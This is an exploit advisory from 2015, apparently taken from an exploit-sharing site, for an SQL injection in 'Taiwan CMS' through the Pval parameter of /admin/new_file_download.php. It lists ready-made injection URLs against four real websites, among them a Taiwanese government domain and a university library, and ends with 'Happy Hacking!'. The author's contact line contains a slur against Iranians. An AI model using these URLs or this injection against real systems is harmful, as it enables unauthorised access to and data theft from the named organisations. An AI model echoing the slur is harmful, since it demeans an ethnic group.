facebook facebook twitter rss

Taiwan CMS - SQL Injection

Author: bRpsd , Published: 03-07-2015
******************************************************************
Exploit Title => Taiwan CMS - SQL Injection

Date => 01-07-2015

Founder / Author => bRpsd
Contact via Skype => vegnox <= I dont accept iranians faggots lol ..
eMail => cy@live.no

Software/ Vendor => Taiwan CMS Script
*******************************************************************

Vulnerable File=> /admin/new_file_download.php
Parameter=> Pval
Injection type=> '





Demo (Test) =>
http://www.raycore.com.tw/raycore_admin/new_file_download.php?Pact=FileDownLoad&Pval=1256'
http://www.globalsat.com.tw/globalsat_admin/new_file_download.php?Pact=FileDownLoad&Pval=948'
http://www.library.just.edu.tw/admin/new_file_download.php?Pact=FileDownLoad&Pval=10466' {INJECT RESULT IN DOWNLOADED FILE}
http://placesearch.moi.gov.tw/manager_admin/new_file_download.php?Pact=FileDownLoad&Pval=288' {INJECT RESULT IN DOWNLOADED FILE}


Happy Hacking !

Like us on Facebook :